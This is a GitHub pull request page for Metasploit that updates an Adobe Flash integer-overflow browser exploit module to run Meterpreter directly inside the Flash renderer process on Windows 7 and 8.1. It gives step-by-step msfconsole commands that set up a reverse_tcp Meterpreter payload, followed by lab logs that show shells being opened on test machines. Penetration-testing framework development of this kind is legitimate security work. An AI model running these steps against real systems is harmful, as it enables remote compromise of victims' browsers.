Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

adobe_flash_casi32_int_overflow: Execution from the flash renderer / Windows 8.1 #5517

Merged
merged 4 commits into from Jun 10, 2015
Merged

adobe_flash_casi32_int_overflow: Execution from the flash renderer / Windows 8.1 #5517

merged 4 commits into from Jun 10, 2015

Conversation

jvazquez-r7
Copy link
Contributor

This PR modifies modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb to use the flash exploitation code, allowing native payload execution from the flash renderer process. So not more powershell. We execute meterpreter directly and we remain in the same flash renderer process.

It also adds supports for:

  • Firefox (32 bits) / Adobe Flash plug-in on Windows 7 SP1.
  • Firefox (32 bits) / Adobe Flash plug-in on Windows 8.1

Verification

  • Install a Windows 7 target: Windows 7 SP1 32 bits / IE 11 / Firefox 38.0.5 / Adobe Flash 15.0.0.152 (ActiveX and plugin)
  • Install a Windows 8.1 target: Windows 8 SP1 (32 bits or 64 bits), Firefox 38.0.5 (32 bits) and Flash 15.0.0.152 (Plug-in)
  • Run msfconsole and use the module modules/exploits/windows/browser/adobe_flash_casi32_int_overflow
  • Run the module with the windows/meterpreter/reverse_tcp payload
msf > use exploit/windows/browser/adobe_flash_casi32_int_overflow
msf exploit(adobe_flash_casi32_int_overflow) > set SRVHOST 172.16.158.1
SRVHOST => 172.16.158.1
msf exploit(adobe_flash_casi32_int_overflow) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_casi32_int_overflow) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_casi32_int_overflow) > exploit
  • Visit the page from Windows 7 SP1 / IE 11 / Adobe Flash 15.0.0.152 (ActiveX), verify which you get a session and it lives inside the IE renderer process:
msf exploit(adobe_flash_casi32_int_overflow) >
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Gathering target information.
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending HTML response.
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending HTML...
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/gFIr.swf
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.131:49585) at 2015-06-09 11:39:01 -0500

msf exploit(adobe_flash_casi32_int_overflow) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getpid
Current pid: 3148
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > ps -S 3148


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 3148  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe


meterpreter > exit
  • Visit the page from Windows 7 SP1 / Firefox / Adobe Flash 15.0.0.152 (plugin), verify which you get a session and it lives inside the Flash renderer process:
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Gathering target information.
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending HTML response.
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending HTML...
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/moAt.swf
[*] 172.16.158.131   adobe_flash_casi32_int_overflow - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.131:49600) at 2015-06-09 11:39:49 -0500

msf exploit(adobe_flash_casi32_int_overflow) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 1680
meterpreter > ps -S 1680


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 1680  FlashPlayerPlugin_15_0_0_152.exe    x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_152.exe


meterpreter > exit
[*] Shutting down Meterpreter...
  • Visit the page from Window 8.1 / Firefox 38.0.5 / Adobe Flash 15.0.0.152 (Plugin), verify which you get a session and it lives inside the Flash renderer process:
msf exploit(adobe_flash_casi32_int_overflow) >
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Gathering target information.
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Sending HTML response.
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Sending HTML...
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Request: /77mJHi/ZlYYtF/ylpZCt.swf
[*] 172.16.158.132   adobe_flash_casi32_int_overflow - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.132
[*] Meterpreter session 5 opened (172.16.158.1:4444 -> 172.16.158.132:50906) at 2015-06-09 11:48:27 -0500

msf exploit(adobe_flash_casi32_int_overflow) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2500
meterpreter > ps -S 2500


Process list
============

 PID   Name                              Arch  Session  User                  Path
 ---   ----                              ----  -------  ----                  ----
 2500  FlashPlayerPlugin_15_0_0_152.exe  x86   1        WIN-U7MBH836GNO\juan  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_152.exe


meterpreter > exit
[*] Shutting down Meterpreter...

@wchen-r7 wchen-r7 self-assigned this Jun 10, 2015
@wchen-r7
Copy link
Contributor

Tested on all.

@wchen-r7 wchen-r7 merged commit 4f1ee3f into rapid7:master Jun 10, 2015
wchen-r7 added a commit that referenced this pull request Jun 10, 2015
@wchen-r7
Land #5517, adobe_flash_casi32_int_overflow (exec from the flash rend…
667db8b 
…erer)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
enhancement module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7